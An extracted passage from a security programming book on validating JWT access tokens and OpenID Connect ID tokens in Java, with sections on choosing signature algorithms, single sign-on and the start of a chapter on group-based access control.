TIP
Although public key cryptography is more secure in this sense, it’s also
more complicated with more ways to fail. Digital signatures are also much
slower than HMAC and other symmetric algorithms—typically 10–100x slower
for equivalent security.
Authorization server
API
Client
Public key
Private key
JWT
JWT
The AS signs a JWT-based access
token using its private key.
The API can verify the
JWT using the public key
it retrieves from the AS.
The private
key is never
shared.
Figure 7.8
When using JWT-based access tokens, the AS signs the JWT using a private
key that is known only to the AS. The API can retrieve a corresponding public key from
the AS to verify that the JWT is genuine. The public key cannot be used to create a new
JWT, ensuring that access tokens can be issued only by the AS.
251
Validating an access token
RETRIEVING THE PUBLIC KEY
The API can be directly configured with the public key of the AS. For example, you
could create a keystore that contains the public key, which the API can read when it
first starts up. Although this will work, it has some disadvantages:
A Java keystore can only contain certificates, not raw public keys, so the AS
would need to create a self-signed certificate purely to allow the public key to be
imported into the keystore. This adds complexity that would not otherwise be
required.
If the AS changes its public key, which is recommended, then the keystore will
need to be manually updated to list the new public key and remove the old one.
Because some access tokens using the old key may still be in use, the keystore
may have to list both public keys until those old tokens expire. This means that
two manual updates need to be performed: one to add the new public key, and
a second update to remove the old public key when it’s no longer needed.
Although you could use X.509 certificate chains to establish trust in a key via a certifi-
cate authority, just as for HTTPS in section 7.4.2, this would require the certificate
chain to be attached to each access token JWT (using the standard x5c header
described in chapter 6). This would increase the size of the access token beyond rea-
sonable limits—a certificate chain can be several kilobytes in size. Instead, a common
solution is for the AS to publish its public key in a JSON document known as a JWK
Set (https://tools.ietf.org/html/rfc7517). An example JWK Set is shown in listing 7.10
and consists of a JSON object with a single keys attribute, whose value is an array of
JSON Web Keys (see chapter 6). The API can periodically fetch the JWK Set from an
HTTPS URI provided by the AS. The API can trust the public keys in the JWK Set
because they were retrieved over HTTPS from a trusted URI, and that HTTPS con-
nection was authenticated using the server certificate presented during the TLS
handshake.
{"keys": [
{
"kty": "EC",
"kid": "I4x/IijvdDsUZMghwNq2gC/7pYQ=",
"use": "sig",
"x": "k5wSvW_6JhOuCj-9PdDWdEA4oH90RSmC2GTliiUHAhXj6rmTdE2S-
➥ _zGmMFxufuV",
"y": "XfbR-tRoVcZMCoUrkKtuZUIyfCgAy8b0FWnPZqevwpdoTzGQBOXSN
➥ i6uItN_o4tH",
"crv": "P-384",
"alg": "ES384"
},
{
"kty": "RSA",
"kid": "wU3ifIIaLOUAReRB/FG6eM1P1QM=",
"use": "sig",
Listing 7.10
An example JWK Set
The JWK Set has a “keys” attribute,
which is an array of JSON Web Keys.
An elliptic
curve
public key
An RSA
public key
252
CHAPTER 7
OAuth2 and OpenID Connect
"n": "10iGQ5l5IdqBP1l5wb5BDBZpSyLs4y_Um-kGv_se0BkRkwMZavGD_Nqjq8x3-
➥ fKNI45nU7E7COAh8gjn6LCXfug57EQfi0gOgKhOhVcLmKqIEXPmqeagvMndsXWIy6k8WP
➥ PwBzSkN5PDLKBXKG_X1BwVvOE9276nrx6lJq3CgNbmiEihovNt_6g5pCxiSarIk2uaG3T
➥ 3Ve6hUJrM0W35QmqrNM9rL3laPgXtCuz4sJJN3rGnQq_25YbUawW9L1MTVbqKxWiyN5Wb
➥ XoWUg8to1DhoQnXzDymIMhFa45NTLhxtdH9CDprXWXWBaWzo8mIFes5yI4AJW4ZSg1PPO
➥ 2UJSQ",
"e": "AQAB",
"alg": "RS256"
}
]}
Many JWT libraries have built-in support for retrieving keys from a JWK Set over
HTTPS, including periodically refreshing them. For example, the Nimbus JWT library
that you used in chapter 6 supports retrieving keys from a JWK Set URI using the
RemoteJWKSet class:
var jwkSetUri = URI.create("https://as.example.com:8443/jwks_uri");
var jwkSet = new RemoteJWKSet(jwkSetUri);
Listing 7.11 shows the configuration of a new SignedJwtAccessTokenStore that will
validate an access token as a signed JWT. The constructor takes a URI for the end-
point on the AS to retrieve the JWK Set from and constructs a RemoteJWKSet based on
this. It also takes in the expected issuer and audience values of the JWT, and the JWS
signature algorithm that will be used. As you’ll recall from chapter 6, there are attacks
on JWT verification if the wrong algorithm is used, so you should always strictly vali-
date that the algorithm header has an expected value. Open the src/main/java/com/
manning/apisecurityinaction/token folder and create a new file SignedJwtAccess-
TokenStore.java with the contents of listing 7.11. You’ll fill in the details of the read
method shortly.
TIP
If the AS supports discovery (see section 7.2.3), then it may advertise its
JWK Set URI as the jwks_uri field of the discovery document.
package com.manning.apisecurityinaction.token;
import com.nimbusds.jose.*;
import com.nimbusds.jose.jwk.source.*;
import com.nimbusds.jose.proc.*;
import com.nimbusds.jwt.proc.DefaultJWTProcessor;
import spark.Request;
import java.net.*;
import java.text.ParseException;
import java.util.Optional;
public class SignedJwtAccessTokenStore implements SecureTokenStore {
private final String expectedIssuer;
private final String expectedAudience;
Listing 7.11
The SignedJwtAccessTokenStore
253
Validating an access token
private final JWSAlgorithm signatureAlgorithm;
private final JWKSource<SecurityContext> jwkSource;
public SignedJwtAccessTokenStore(String expectedIssuer,
String expectedAudience,
JWSAlgorithm signatureAlgorithm,
URI jwkSetUri)
throws MalformedURLException {
this.expectedIssuer = expectedIssuer;
this.expectedAudience = expectedAudience;
this.signatureAlgorithm = signatureAlgorithm;
this.jwkSource = new RemoteJWKSet<>(jwkSetUri.toURL());
}
@Override
public String create(Request request, Token token) {
throw new UnsupportedOperationException();
}
@Override
public void revoke(Request request, String tokenId) {
throw new UnsupportedOperationException();
}
@Override
public Optional<Token> read(Request request, String tokenId) {
// See listing 7.12
}
}
A JWT access token can be validated by configuring the processor class to use the
RemoteJWKSet as the source for verification keys (ES256 is an example of a JWS signa-
ture algorithm):
var verifier = new DefaultJWTProcessor<>();
var keySelector = new JWSVerificationKeySelector<>(
JWSAlgorithm.ES256, jwkSet);
verifier.setJWSKeySelector(keySelector);
var claims = verifier.process(tokenId, null);
After verifying the signature and the expiry time of the JWT, the processor returns the
JWT Claims Set. You can then verify that the other claims are correct. You should
check that the JWT was issued by the AS by validating the iss claim, and that the
access token is meant for this API by ensuring that an identifier for the API appears in
the audience (aud) claim (listing 7.12).
In the normal OAuth2 flow, the AS is not informed by the client which APIs it
intends to use the access token for,9 and so the audience claim can vary from one AS to
another. Consult the documentation for your AS software to configure the intended
9 As you might expect by now, there is a proposal to allow the client to indicate the resource servers it intends
to access: http://mng.bz/6ANG
Configure the
expected issuer,
audience, and
JWS algorithm.
Construct a
RemoteJWKSet
to retrieve
keys from the
JWK Set URI.
254
CHAPTER 7
OAuth2 and OpenID Connect
audience. Another area of disagreement between AS software is in how the scope of
the token is communicated. Some AS software produces a string scope claim, whereas
others produce a JSON array of strings. Some others may use a different field entirely,
such as scp or scopes. Listing 7.12 shows how to handle a scope claim that may either
be a string or an array of strings. Open SignedJwtAccessTokenStore.java in your editor
again and update the read method based on the listing.
@Override
public Optional<Token> read(Request request, String tokenId) {
try {
var verifier = new DefaultJWTProcessor<>();
var keySelector = new JWSVerificationKeySelector<>(
signatureAlgorithm, jwkSource);
verifier.setJWSKeySelector(keySelector);
var claims = verifier.process(tokenId, null);
if (!issuer.equals(claims.getIssuer())) {
return Optional.empty();
}
if (!claims.getAudience().contains(audience)) {
return Optional.empty();
}
var expiry = claims.getExpirationTime().toInstant();
var subject = claims.getSubject();
var token = new Token(expiry, subject);
String scope;
try {
scope = claims.getStringClaim("scope");
} catch (ParseException e) {
scope = String.join(" ",
claims.getStringListClaim("scope"));
}
token.attributes.put("scope", scope);
return Optional.of(token);
} catch (ParseException | BadJOSEException | JOSEException e) {
return Optional.empty();
}
}
CHOOSING A SIGNATURE ALGORITHM
The JWS standard that JWT uses for signatures supports many different public key sig-
nature algorithms, summarized in table 7.2. Because public key signature algorithms
are expensive and usually limited in the amount of data that can be signed, the con-
tents of the JWT is first hashed using a cryptographic hash function and then the hash
value is signed. JWS provides variants for different hash functions when using the
Listing 7.12
Validating signed JWT access tokens
Verify the
signature
first.
Ensure the
issuer and
audience have
expected values.
Extract the JWT
subject and
expiry time.
The scope may be
either a string or
an array of strings.
255
Validating an access token
same underlying signature algorithm. All the allowed hash functions provide ade-
quate security, but SHA-512 is the most secure and may be slightly faster than the
other choices on 64-bit systems. The exception to this rule is when using ECDSA sig-
natures, because JWS specifies elliptic curves to use along with each hash function;
the curve used with SHA-512 has a significant performance penalty compared with the
curve used for SHA-256.
Of these choices, the best is EdDSA, based on the Edwards Curve Digital Signature
Algorithm (https://tools.ietf.org/html/rfc8037). EdDSA signatures are fast to pro-
duce and verify, produce compact signatures, and are designed to be implemented
securely against side-channel attacks. Not all JWT libraries or AS software supports
EdDSA signatures yet. The older ECDSA standard for elliptic curve digital signatures
has wider support, and shares some of the same properties as EdDSA, but is slightly
slower and harder to implement securely.
WARNING
ECDSA signatures require a unique random nonce for each signa-
ture. If a nonce is repeated, or even just a few bits are not completely random,
then the private key can be reconstructed from the signature values. This
kind of bug was used to hack the Sony PlayStation 3, steal Bitcoin cryptocur-
rency from wallets on Android mobile phones, among many other cases.
Deterministic ECDSA signatures (https://tools.ietf.org/html/rfc6979) can be
used to prevent this, if your library supports them. EdDSA signatures are also
immune to this issue.
RSA signatures are expensive to produce, especially for secure key sizes (a 3072-bit
RSA key is roughly equivalent to a 256-bit elliptic curve key or a 128-bit HMAC key)
and produce much larger signatures than the other options, resulting in larger JWTs.
Table 7.2
JWS signature algorithms
JWS Algorithm
Hash function
Signature algorithm
RS256
SHA-256
RSA with PKCS#1 v1.5 padding
RS384
SHA-384
RS512
SHA-512
PS256
SHA-256
RSA with PSS padding
PS384
SHA-384
PS512
SHA-512
ES256
SHA-256
ECDSA with the NIST P-256 curve
ES384
SHA-384
ECDSA with the NIST P-384 curve
ES512
SHA-512
ECDSA with the NIST P-521 curve
EdDSA
SHA-512 / SHAKE256
EdDSA with either the Ed25519 or Ed448 curves
256
CHAPTER 7
OAuth2 and OpenID Connect
On the other hand, RSA signatures can be validated very quickly. The variants of RSA
using PSS padding should be preferred over those using the older PKCS#1 version 1.5
padding but may not be supported by all libraries.
7.4.5
Encrypted JWT access tokens
In chapter 6, you learned that authenticated encryption can be used to provide the
benefits of encryption to hide confidential attributes and authentication to ensure
that a JWT is genuine and has not been tampered with. Encrypted JWTs can be useful
for access tokens too, because the AS may want to include attributes in the access
token that are useful for the API for making access control decisions, but which
should be kept confidential from third-party clients or from the user themselves. For
example, the AS may include the resource owner’s email address in the token for use
by the API, but this information should not be leaked to the third-party client. In this
case the AS can encrypt the access token JWT by using an encryption key that only the
API can decrypt.
Unfortunately, none of the public key encryption algorithms supported by the
JWT standards provide authenticated encryption,10 because this is less often imple-
mented for public key cryptography. The supported algorithms provide only confi-
dentiality and so must be combined with a digital signature to ensure the JWT is not
tampered with or forged. This is done by first signing the claims to produce a signed
JWT, and then encrypting that signed JWT to produce a nested JOSE structure (fig-
ure 7.9). The downside is that the resulting JWT is much larger than it would be if it
was just signed and requires two expensive public key operations to first decrypt the
outer encrypted JWE and then verify the inner signed JWT. You shouldn’t use the same
key for encryption and signing, even if the algorithms are compatible.
The JWE specifications include several public key encryption algorithms, shown in
table 7.3. The details of the algorithms can be complicated, and several variations are
included. If your software supports it, it’s best to avoid the RSA encryption algorithms
entirely and opt for ECDH-ES encryption. ECDH-ES is based on Elliptic Curve Diffie-
Hellman key agreement, and is a secure and performant choice, especially when used
with the X25519 or X448 elliptic curves (https://tools.ietf.org/html/rfc8037), but
these are not yet widely supported by JWT libraries.
10
I have proposed adding public key authenticated encryption to JOSE and JWT, but the proposal is still a draft
at this stage. See http://mng.bz/oRGN.
257
Validating an access token
WARNING
Most of the JWE algorithms are secure, apart from RSA1_5 which
uses the older PKCS#1 version 1.5 padding algorithm. There are known
attacks against this algorithm, so you should not use it. This padding mode
was replaced by Optimal Asymmetric Encryption Padding (OAEP) that was
Table 7.3
JOSE public key encryption algorithms
JWE Algorithm
Details
Comments
RSA1_5
RSA with PKCS#1 v1.5 padding
This mode is insecure and should
not be used.
RSA-OAEP
RSA with OAEP padding using SHA-1
OAEP is secure but RSA decryption
is slow, and encryption produces
large JWTs.
RSA-OAEP-256
RSA with OAEP padding using SHA-256
ECDH-ES
Elliptic Curve Integrated Encryption
Scheme (ECIES)
A secure encryption algorithm but
the epk header it adds can be bulky.
Best when used with the X25519 or
X448 curves.
ECDH-ES+A128KW
ECDH-ES with an extra AES key-wrapping
step
ECDH-ES+A192KW
ECDH-ES+A256KW
{"sub":"alice","iss":"https://as.example.com",...}
ES256
eyJ0eXAiOiJKV1QiLCJhbGciOiJFUzI1NiJ9.eyJzdWIi...
ECDH-ES
eyJ0eXAiOiJKV1QiLCJlbmMiOiJBMjU2R0NNIiwiYWxnIjo...
Use separate keys for
signing vs. encryption.
The JWT is first
signed . . .
. . . and then
encrypted.
Figure 7.9
When using public key cryptography, a JWT needs to be first signed and then
encrypted to ensure confidentiality and integrity as no standard algorithm provides both
properties. You should use separate keys for signing and encryption even if the algorithms
are compatible.
258
CHAPTER 7
OAuth2 and OpenID Connect
standardized in version 2 of PKCS#1. OAEP uses a hash function internally, so
there are two variants included in JWE: one using SHA-1, and one using SHA-
256. Because SHA-1 is no longer considered secure, you should prefer the
SHA-256 variant, although there are no known attacks against it when used
with OAEP. However, even OAEP has some downsides because it’s a compli-
cated algorithm and less widely implemented. RSA encryption also pro-
duces larger ciphertext than other modes and the decryption operation is
very slow, which is a problem for an access token that may need to be
decrypted many times.
7.4.6
Letting the AS decrypt the tokens
An alternative to using public key signing and encryption would be for the AS to
encrypt access tokens with a symmetric authenticated encryption algorithm, such as
the ones you learned about in chapter 6. Rather than sharing this symmetric key with
every API, they instead call the token introspection endpoint to validate the token
rather than verifying it locally. Because the AS does not need to perform a database
lookup to validate the token, it may be easier to horizontally scale the AS in this case
by adding more servers to handle increased traffic.
This pattern allows the format of access tokens to change over time because only
the AS validates tokens. In software engineering terms, the choice of token format is
encapsulated by the AS and hidden from resource servers, while with public key
signed JWTs, each API knows how to validate tokens, making it much harder to change
the representation later. More sophisticated patterns for managing access tokens for
microservice environments are covered in part 4.
7.5
Single sign-on
One of the advantages of OAuth2 is the ability to centralize authentication of users at
the AS, providing a single sign-on (SSO) experience (figure 7.10). When the user’s cli-
ent needs to access an API, it redirects the user to the AS authorization endpoint to
get an access token. At this point the AS authenticates the user and asks for consent
for the client to be allowed access. Because this happens within a web browser, the AS
typically creates a session cookie, so that the user does not have to login again.
If the user then starts using a different client, such as a different web application,
they will be redirected to the AS again. But this time the AS will see the existing session
Pop quiz
8
Which key is used to validate a public key signature?
a
The public key
b
The private key
The answer is at the end of the chapter.
259
Single sign-on
cookie and won’t prompt the user to log in. This even works for mobile apps from dif-
ferent developers if they are installed on the same device and use the system browser
for OAuth flows, as recommended in section 7.3. The AS may also remember which
scopes a user has granted to clients, allowing the consent screen to be skipped when a
user returns to that client. In this way, OAuth can provide a seamless SSO experience
for users replacing traditional SSO solutions. When the user logs out, the client can
revoke their access or refresh token using the OAuth token revocation endpoint,
which will prevent further access.
WARNING
Though it might be tempting to reuse a single access token to pro-
vide access to many different APIs within an organization, this increases the
risk if a token is ever stolen. Prefer to use separate access tokens for each dif-
ferent API.
Authorization server
API
API
Web browser client
Mobile app client
API
API
API
API
Token introspection
Token introspection
Authenticate
Clients can delegate to
the AS to authenticate the
user and manage tokens.
APIs can all call a single
endpoint on the AS to
validate access tokens.
If the user has an existing
session with the AS, then they
don’t need to log in again to
approve a new access token.
Figure 7.10
OAuth2 enables single sign-on for users. As clients delegate to the
AS to get access tokens, the AS is responsible for authenticating all users. If the
user has an existing session with the AS, then they don’t need to be authenticated
again, providing a seamless SSO experience.
260
CHAPTER 7
OAuth2 and OpenID Connect
7.6
OpenID Connect
OAuth can provide basic SSO functionality, but the primary focus is on delegated
third-party access to APIs rather than user identity or session management. The OpenID
Connect (OIDC) suite of standards (https://openid.net/developers/specs/) extend
OAuth2 with several features:
A standard way to retrieve identity information about a user, such as their name,
email address, postal address, and telephone number. The client can access a
UserInfo endpoint to retrieve identity claims as JSON using an OAuth2 access
token with standard OIDC scopes.
A way for the client to request that the user is authenticated even if they have an
existing session, and to ask for them to be authenticated in a particular way,
such as with two-factor authentication. While obtaining an OAuth2 access token
may involve user authentication, it’s not guaranteed that the user was even pres-
ent when the token was issued or how recently they logged in. OAuth2 is primar-
ily a delegated access protocol, whereas OIDC provides a full authentication
protocol. If the client needs to positively authenticate a user, then OIDC should
be used.
Extensions for session management and logout, allowing clients to be notified
when a user logs out of their session at the AS, enabling the user to log out of all
clients at once (known as single logout).
Although OIDC is an extension of OAuth, it rearranges the pieces a bit because the
API that the client wants to access (the UserInfo endpoint) is part of the AS itself (fig-
ure 7.11). In a normal OAuth2 flow, the client would first talk to the AS to obtain an
access token and then talk to the API on a separate resource server.
DEFINITION
In OIDC, the AS and RS are combined into a single entity known
as an OpenID Provider (OP). The client is known as a Relying Party (RP).
The most common use of OIDC is for a website or app to delegate authentication to a
third-party identity provider. If you’ve ever logged into a website using your Google or
Facebook account, you’re using OIDC behind the scenes, and many large social media
companies now support this.
7.6.1
ID tokens
If you follow the OAuth2 recommendations in this chapter, then finding out who a
user is involves three roundtrips to the AS for the client:
1
First, the client needs to call the authorization endpoint to get an authorization
code.
2
Then the client exchanges the code for an access token.
3
Finally, the client can use the access token to call the UserInfo endpoint to
retrieve the identity claims for the user.
261
OpenID Connect
This is a lot of overhead before you even know the user’s name, so OIDC provides a
way to return some of the identity and authentication claims about a user as a new
type of token known as an ID token, which is a signed and optionally encrypted JWT.
This token can be returned directly from the token endpoint in step 2, or even
directly from the authorization endpoint in step 1, in a variant of the implicit flow.
There is also a hybrid flow in which the authorization endpoint returns an ID token
directly along with an authorization code that the client can then exchange for an
access token.
DEFINITION
An ID token is a signed and optionally encrypted JWT that con-
tains identity and authentication claims about a user.
To validate an ID token, the client should first process the token as a JWT, decrypting
it if necessary and verifying the signature. When a client registers with an OIDC pro-
vider, it specifies the ID token signing and encryption algorithms it wants to use and
can supply public keys to be used for encryption, so the client should ensure that the
Authorization server
API
Client
Authorization server
UserInfo API
Client
In normal OAuth, there are
three entities involved.
In OpenID Connect, the
client is accessing the
UserInfo endpoint on
the AS itself.
Figure 7.11
In OpenID Connect, the client accesses APIs on the AS itself,
so there are only two entities involved compared to the three in normal OAuth.
The client is known as the Relying Party (RP), while the combined AS and API
is known as an OpenID Provider (OP).
262
CHAPTER 7
OAuth2 and OpenID Connect
received ID token uses these algorithms. The client should then verify the standard
JWT claims in the ID token, such as the expiry, issuer, and audience values as
described in chapter 6. OIDC defines several additional claims that should also be ver-
ified, described in table 7.4.
When requesting authentication, the client can use extra parameters to the authoriza-
tion endpoint to indicate how the user should be authenticated. For example, the
max_time parameter can be used to indicate how recently the user must have authen-
ticated to be allowed to reuse an existing login session at the OP, and the acr_values
parameter can be used to indicate acceptable authentication levels of assurance. The
prompt=login parameter can be used to force reauthentication even if the user has an
existing session that would satisfy any other constraints specified in the authentication
request, while prompt=none can be used to check if the user is currently logged in
without authenticating them if they are not.
WARNING
Just because a client requested that a user be authenticated in a
certain way does not mean that they will be. Because the request parameters
are exposed as URL query parameters in a redirect, the user could alter them
to remove some constraints. The OP may not be able to satisfy all requests for
other reasons. The client should always check the claims in an ID token to
make sure that any constraints were satisfied.
Table 7.4
ID token standard claims
Claim
Purpose
Notes
azp
Authorized Party
An ID token can be shared with more than one party and so
have multiple values in the audience claim. The azp claim
lists the client the ID token was initially issued to. A client
directly interacting with an OIDC provider should verify that
it’s the authorized party if more than one party is in the
audience.
auth_time
User authentication time
The time at which the user was authenticated as seconds
from the UNIX epoch.
nonce
Anti-replay nonce
A unique random value that the client sends in the authen-
tication request. The client should verify that the same
value is included in the ID token to prevent replay attacks—
see section 7.6.2 for details.
acr
Authentication context
Class Reference
Indicates the overall strength of the user authentication
performed. This is a string and specific values are defined
by the OP or by other standards.
amr
Authentication Methods
References
An array of strings indicating the specific methods used.
For example, it might contain ["password", "otp"] to
indicate that the user supplied a password and a one-time
password.
263
OpenID Connect
7.6.2
Hardening OIDC
While an ID token is protected against tampering by the cryptographic signature,
there are still several possible attacks when an ID token is passed back to the client in
the URL from the authorization endpoint in either the implicit or hybrid flows:
The ID token might be stolen by a malicious script running in the same browser,
or it might leak in server access logs or the HTTP Referer header. Although an
ID token does not grant access to any API, it may contain personal or sensitive
information about the user that should be protected.
An attacker may be able to capture an ID token from a legitimate login
attempt and then replay it later to attempt to login as a different user. A cryp-
tographic signature guarantees only that the ID token was issued by the cor-
rect OP but does not by itself guarantee that it was issued in response to this
specific request.
The simplest defense against these attacks is to use the authorization code flow with
PKCE as recommended for all OAuth2 flows. In this case the ID token is only issued
by the OP from the token endpoint in response to a direct HTTPS request from the
client. If you decide to use a hybrid flow to receive an ID token directly in the redirect
back from the authorization endpoint, then OIDC includes several protections that
can be employed to harden the flow:
The client can include a random nonce parameter in the request and verify that
the same nonce is included in the ID token that is received in response. This
prevents replay attacks as the nonce in a replayed ID token will not match the
fresh value sent in the new request. The nonce should be randomly generated
and stored on the client just like the OAuth state parameter and the PKCE
code_challenge. (Note that the nonce parameter is unrelated to a nonce used
in encryption as covered in chapter 6.)
The client can request that the ID token is encrypted using a public key sup-
plied during registration or using AES encryption with a key derived from the
client secret. This prevents sensitive personal information being exposed if the
ID token is intercepted. Encryption alone does not prevent replay attacks, so an
OIDC nonce should still be used in this case.
The ID token can include c_hash and at_hash claims that contain crypto-
graphic hashes of the authorization code and access token associated with a
request. The client can compare these to the actual authorization code and
access token it receives to make sure that they match. Together with the nonce
and cryptographic signature, this effectively prevents an attacker swapping the
authorization code or access token in the redirect URL when using the hybrid
or implicit flows.
TIP
You can use the same random value for the OAuth state and OIDC
nonce parameters to avoid having to generate and store both on the client.
264
CHAPTER 7
OAuth2 and OpenID Connect
The additional protections provided by OIDC can mitigate many of the problems with
the implicit grant. But they come at a cost of increased complexity compared with the
authorization code grant with PKCE, because the client must perform several com-
plex cryptographic operations and check many details of the ID token during valida-
tion. With the auth code flow and PKCE, the checks are performed by the OP when
the code is exchanged for access and ID tokens.
7.6.3
Passing an ID token to an API
Given that an ID token is a JWT and is intended to authenticate a user, it’s tempting to
use them for authenticating users to your API. This can be a convenient pattern for
first-party clients, because the ID token can be used directly as a stateless session
token. For example, the Natter web UI could use OIDC to authenticate a user and
then store the ID token as a cookie or in local storage. The Natter API would then be
configured to accept the ID token as a JWT, verifying it with the public key from the
OP. An ID token is not appropriate as a replacement for access tokens when dealing
with third-party clients for the following reasons:
ID tokens are not scoped, and the user is asked only for consent for the client to
access their identity information. If the ID token can be used to access APIs
then any client with an ID token can act as if they are the user without any
restrictions.
An ID token authenticates a user to the client and is not intended to be used by
that client to access an API. For example, imagine if Google allowed access to its
APIs based on an ID token. In that case, any website that allowed its users to log
in with their Google account (using OIDC) would then be able to replay the ID
token back to Google’s own APIs to access the user’s data without their consent.
To prevent these kinds of attacks, an ID token has an audience claim that only
lists the client. An API should reject any JWT that does not list that API in the
audience.
If you’re using the implicit or hybrid flows, then the ID token is exposed in the
URL during the redirect back from the OP. When an ID token is used for access
control, this has the same risks as including an access token in the URL as the
token may leak or be stolen.
You should therefore not use ID tokens to grant access to an API.
NOTE
Never use ID tokens for access control for third-party clients. Use
access tokens for access and ID tokens for identity. ID tokens are like user-
names; access tokens are like passwords.
Although you shouldn’t use an ID token to allow access to an API, you may need to
look up identity information about a user while processing an API request or need to
enforce specific authentication requirements. For example, an API for initiating
financial transactions may want assurance that the user has been freshly authenticated
265
OpenID Connect
using a strong authentication mechanism. Although this information can be returned
from a token introspection request, this is not always supported by all authorization
server software. OIDC ID tokens provide a standard token format to verify these
requirements. In this case, you may want to let the client pass in a signed ID token that
it has obtained from a trusted OP. When this is allowed, the API should accept the ID
token only in addition to a normal access token and make all access control decisions
based on the access token.
When the API needs to access claims in the ID token, it should first verify that it’s
from a trusted OP by validating the signature and issuer claims. It should also ensure
that the subject of the ID token exactly matches the resource owner of the access
token or that there is some other trust relationship between them. Ideally, the API
should then ensure that its own identifier is in the audience of the ID token and that
the client’s identifier is the authorized party (azp claim), but not all OP software sup-
ports setting these values correctly in this case. Listing 7.13 shows an example of vali-
dating the claims in an ID token against those in an access token that has already been
used to authenticate the request. Refer to the SignedJwtAccessToken store for details
on configuring the JWT verifier.
var idToken = request.headers("X-ID-Token");
var claims = verifier.process(idToken, null);
if (!expectedIssuer.equals(claims.getIssuer())) {
throw new IllegalArgumentException(
"invalid id token issuer");
}
if (!claims.getAudience().contains(expectedAudience)) {
throw new IllegalArgumentException(
"invalid id token audience");
}
var client = request.attribute("client_id");
var azp = claims.getStringClaim("azp");
if (client != null && azp != null && !azp.equals(client)) {
throw new IllegalArgumentException(
"client is not authorized party");
}
var subject = request.attribute("subject");
if (!subject.equals(claims.getSubject())) {
throw new IllegalArgumentException(
"subject does not match id token");
}
request.attribute("id_token.claims", claims);
Listing 7.13
Validating an ID token
Extract the ID token
from the request and
verify the signature.
Ensure the token
is from a trusted
issuer and that this
API is the intended
audience.
If the ID token has an
azp claim, then ensure
it’s for the same client
that is calling the API.
Check that the subject of
the ID token matches the
resource owner of the
access token.
Store the verified ID token
claims in the request attributes
for further processing.
266
CHAPTER 7
OAuth2 and OpenID Connect
Answers to pop quiz questions
1
d and e. Whether scopes or permissions are more fine-grained varies from case
to case.
2
a and e. The implicit grant is discouraged because of the risk of access tokens
being stolen. The ROPC grant is discouraged because the client learns the
user’s password.
3
a. Mobile apps should be public clients because any credentials embedded in
the app download can be easily extracted by users.
4
a. Claimed HTTPS URIs are more secure.
5
True. PKCE provides security benefits in all cases and should always be used.
6
d.
7
c.
8
a. The public key is used to validate a signature.
Summary
Scoped tokens allow clients to be given access to some parts of your API but not
others, allowing users to delegate limited access to third-party apps and services.
The OAuth2 standard provides a framework for third-party clients to register
with your API and negotiate access with user consent.
All user-facing API clients should use the authorization code grant with PKCE
to obtain access tokens, whether they are traditional web apps, SPAs, mobile
apps, or desktop apps. The implicit grant should no longer be used.
The standard token introspection endpoint can be used to validate an access
token, or JWT-based access tokens can be used to reduce network roundtrips.
Refresh tokens can be used to keep token lifetimes short without disrupting the
user experience.
The OpenID Connect standard builds on top of OAuth2, providing a compre-
hensive framework for offloading user authentication to a dedicated service.
ID tokens can be used for user identification but should be avoided for access
control.
267
Identity-based
access control
As Natter has grown, the number of access control list (ACL; chapter 3) entries has
grown too. ACLs are simple, but as the number of users and objects that can be
accessed through an API grows, the number of ACL entries grows along with them.
If you have a million users and a million objects, then in the worst case you could
end up with a billion ACL entries listing the individual permissions of each user for
each object. Though that approach can work with fewer users, it becomes more of a
problem as the user base grows. This problem is particularly bad if permissions are
centrally managed by a system administrator (mandatory access control, or MAC, as
discussed in chapter 7), rather than determined by individual users (discretionary
access control, or DAC). If permissions are not removed when no longer required,
This chapter covers
Organizing users into groups
Simplifying permissions with role-based access
control
Implementing more complex policies with
attribute-based access control
Centralizing policy management with a policy
engine
268
CHAPTER 8
Identity-based access control
users can end up accumulating privileges, violating the principle of least privilege. In
this chapter you’ll learn about alternative ways of organizing permissions in the identity-
based access control model. In chapter 9, we’ll look at alternative non-identity-based
access control models.
DEFINITION
Identity-based access control (IBAC) determines what you can do
based on who you are. The user performing an API request is first authenti-
cated and then a check is performed to see if that user is authorized to per-
form the requested action.
8.1
Users and groups
One of the most common approaches to simplifying permission management is to
collect related users into groups, as shown in figure 8.1. Rather than the subject of an
access control decision always being an individual user, groups allow permissions to be
assigned to collections of users. There is a many-to-many relationship between users
and groups: a group can have many members, and a user can belong to many groups.
If the membership of a group is defined in terms of subjects (which may be either
users or other groups), then it is also possible to have groups be members of other
groups, creating a hierarchical structure. For example, you might define a group for
employees and another one for customers. If you then add a new group for project
managers, you could add this group to the employees’ group: all project managers are
employees.
Subject
User
Group
Member
A subject is either an
individual user or a group.
The members of a group are
subjects and so can themselves
be other groups.
A group can have many members,
and a subject can be in many groups,
so it is a many-to-many relationship.
Figure 8.1
Groups are added as a new type of subject. Permissions can then
be assigned to individual users or to groups. A user can be a member of many
groups and each group can have many members.
269
Users and groups
The advantage of groups is that you can now assign permissions to groups and be sure
that all members of that group have consistent permissions. When a new software
engineer joins your organization, you can simply add them to the “software engi-
neers” group rather than having to remember all the individual permissions that they
need to get their job done. And when they change jobs, you simply remove them from
that group and add them to a new one.
The implementation of simple groups is straightforward. Currently in the Natter API
you have written, there is a users table and a permissions table that acts as an ACL
linking users to permissions within a space. To add groups, you could first add a new
table to indicate which users are members of which groups:
CREATE TABLE group_members(
group_id VARCHAR(30) NOT NULL,
user_id VARCHAR(30) NOT NULL REFERENCES users(user_id));
CREATE INDEX group_member_user_idx ON group_members(user_id);
When the user authenticates, you can then look up the groups that user is a member
of and add them as an additional request attribute that can be viewed by other pro-
cesses. Listing 8.1 shows how groups could be looked up in the authenticate()
method in UserController after the user has successfully authenticated.
if (hash.isPresent() && SCryptUtil.check(password, hash.get())) {
request.attribute("subject", username);
var groups = database.findAll(String.class,
"SELECT DISTINCT group_id FROM group_members " +
"WHERE user_id = ?", username);
request.attribute("groups", groups);
}
You can then either change the permissions table to allow either a user or group ID
to be used (dropping the foreign key constraint to the users table):
UNIX groups
Another advantage of groups is that they can be used to compress the permissions
associated with an object in some cases. For example, the UNIX file system stores
permissions for each file as a simple triple of permissions for the current user, the
user’s group, and anyone else. Rather than storing permissions for many individual
users, the owner of the file can assign permissions to only a single pre-existing group,
dramatically reducing the amount of data that must be stored for each file. The down-
side of this compression is that if a group doesn’t exist with the required members,
then the owner may have to grant access to a larger group than they would otherwise
like to.
Listing 8.1
Looking up groups during authentication
Look up all
groups that the
user belongs to.
Set the
user’s groups
as a new
attribute on
the request.
270
CHAPTER 8
Identity-based access control
CREATE TABLE permissions(
space_id INT NOT NULL REFERENCES spaces(space_id),
user_or_group_id VARCHAR(30) NOT NULL,
perms VARCHAR(3) NOT NULL);
